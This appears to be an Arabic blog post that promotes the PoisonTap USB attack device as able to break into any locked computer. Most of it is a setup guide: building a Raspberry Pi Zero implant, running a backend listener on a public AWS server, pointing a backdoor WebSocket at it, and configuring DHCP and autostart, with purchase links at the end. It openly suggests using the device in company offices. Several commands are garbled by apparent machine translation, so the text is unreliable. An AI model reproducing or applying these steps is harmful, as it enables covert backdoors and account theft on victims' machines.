اخطر مفتاح يو اس بي قادر على اختراق اي حاسوب يتم توصيله به حتى لو مغلق بكلمة مرور

شكرا على زيارتك اتمنى ان تعود

Samy Kamkar وهو باحت امني مثير للجدل له العديد من الادوات التي يستطيع من خلالها تنفيد مجموعة من الاشياء الغريبة التي قد تبدو لك مستحيلة او غير ممكنة ، له انجازات كثيرة في مجال الامن والحماية ، 

 اخر ما توصل اليها هذا الشخص في هذا المجال ، وهو عبارة عن مفتاح يو اس بي ، يقوم باختراق اي حاسوب بعد ربطه معه  حتى لو كان الجهاز مغلق بكلمة سركما ان مضادات الفايروسات لايمكنها عمل شيء معه!

هذه الاداة الخطيرة تسمى "PoisonTap" حيث تستطيع هذه الاداة من اختراق اي حاسوب تثبيت مجموعة من الأبواب الخلفية backdoor على شبكة الإنترنت الخاصة به والتي تسمح للمهاجم بالوصول إلى حسابات الضحية على الانترنت، ومواقع الشبكة الداخلية للشركات، أو حتى جهاز التوجيه الخاصة بهم.وبدلا من استغلال أي ثغرة أمنية مكشوفة ، تقوم هذه الاداة بالهجوم عن طريقة سلسلة من الثغرات الامنية والعيوب البرمجية الموجودة في نظام التشغيل ومتصفح الانترنت ، ، مما يجعل الهجوم أصعب بكثير للحماية ضده.

الوقت الذي تحتاجه هذه الاداة لا يتجاوز دقيقة واحدة ، وهذا ما يجعل اكثر خطورة ، حيث بامكان اي شخص استعمالها في مكاتب الشركات والادارات وما الى ذلك . كما ثمنه لا يتعدى 5 دولارات .Samy Kamkarنشر فيديو على قناته في اليوتيوب يشرح فيه الاداة بالتفصيل ، مع عملية اختراق لاحد الحواسيب 

والان ماذا ستحتاج وماهي الادوات اللازمة والاوامر الخاصة

______________________________________:

A Raspberry pi zero.

خادم ويب يمكن الوصول إليه بشكل عام.

بطاقة SD (لتثبيت raspbian على - يجب أن يكون 16 جيجابايت على الأقل).

كابل USB صغير.

ستحتاج اولا الى

بناء الصورة

قم بتشغيل أوامر linux / unix التالية لتثبيت raspbian على بطاقة sd الخاصة بك

آخر تسجيل دخول: Sun Feb 19 15:16:09 on ttys001

MBP: ~ secsleuth $ ls

2017/03/02-raspbian-jessie.img

MBP: ~ secsleuth $ sudo dd bs = 1m if = 2017-03-02-raspbian-jessie.img of = / dev / disk2

4190 + 0 يسجل في

تسجيل 4190 + 0

4393533440 بايت المنقولة في 1346.772204 ثانية (3262269 بايت / ثانية)

MBP: ~ secsleuth $  (يمكن هنا تغيير الاسم او الاحتفاظ به للسهولة )

بعد إنشاء الصورة ، نحتاج إلى إنشاء ملف يسمى "ssh" ونسخه إلى جذر بطاقة SD بحيث يمكن الوصول إلى pi0 عبر ssh

تثبيت الأدوات على الخادم الخاص بك

عند تشغيل poisontap ، ستحتاج إلى خادم من أجل pi0 لبيانات الأنابيب ، يمكنك تشغيل الخادم الخاص بك وتشغيله عن طريق تشغيل الأوامر التالية:

$ sudo apt-get install git npm

$ سودو npm تثبيت websocket

$ curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -

$ sudo apt-get install nodejs

$ git clone https://github.com/samyk/poisontap

CD $ poisontap

عقدة sudo $ backend_server.js &

السبت 01 أبريل 2017 08:30:47 GMT + 0000 (UTC) يستمع الخادم على المنفذ 1337

الآن الخادم الخاص بك هو جاهز والاستماع ل poisontap الخاص بك. يرجى ملاحظة أنه يجب أن يكون الخادم الخاص بك متاحًا للجمهور العام حتى يستخدم هذا الخادم مثيلًا مستضافًا لخدمة AWS.

تكوين صنبور السم الخاص بك

مثلما فعلنا فقط مع خادم الويب ، يجب علينا الآن إدخال ssh في pee0 للتوت وإكمال إعداد poisontap باستخدام الأوامر التالية:

$ sudo apt-get -y install isc-dhcp-server dsniff git

$ curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -

$ sudo apt-get install nodejs

$ git clone https://github.com/samyk/poisontap

CD $ poisontap

الآن قم بتحديث ملف backdoor.html للإشارة إلى خادم الويب الذي قمنا بإعداده مسبقًا:

var socket = new WebSocket ('ws: // <amazon EC2 instance address>: 1337')؛

بعد ذلك ، نحتاج إلى إضافة ما يلي إلى أسفل ملف / etc / network / interfaces

السيارات usb0

    allow-hotplug usb0

    iface usb0 inet ثابت

    العنوان 1.0.0.1

    قناع الشبكة 0.0.0.0

الآن نحن بحاجة إلى تحديث التكوين DHCP في pi0 للعمل مع poisontap لذا قم بتشغيل الأمر التالي:

$ sudo cp -f dhcpd.conf /etc/dhcp/dhcpd.conf

نحتاج أيضًا إلى إضافة الإدخال التالي إلى أسفل الملف / etc / default / isc-dhcp-server:

واجهات = "usb0"

الآن نحن بحاجة فقط إلى التأكد من أن poisontap يعمل عند بدء التشغيل حتى نتمكن 

من القيام بذلك نحن بحاجة إلى تشغيل الأوامر التالية:

$ sudo cp /home/pi/poisontap/pi_startup.sh /etc/init.d/

$ sudo chmod + x /etc/init.d/pi_startup.sh

ونحن بحاجة لإضافة أدناه إلى ملف /etc/rc.local فقط قبل أن يقول الخروج 0

/etc/init.d/pi_startup.sh &

وهذا الآن جهاز poisontap الخاص بك جاهز!

الاستنتاجات

أنت الآن على استعداد للذهاب مع جهاز poisontap الخاص بك! هنا نظرة على الإعداد النهائي الخاص بك:

وحسب علمي موقع امازون وموقع اي بي لديهم هذه الادوات تستطيع شرائها كمجموعه كاملة او شرائها على اجزاء 

وهناك جهاز كامل لاتحتاج الى اي عمليات او اوامر لانها جاهزة للعمل كل ماعليك فعله هو تحضير sd 

هنا موقع امازون وعروضه اضغط على الصورة للذهاب الى الموقع

وشكرا لكم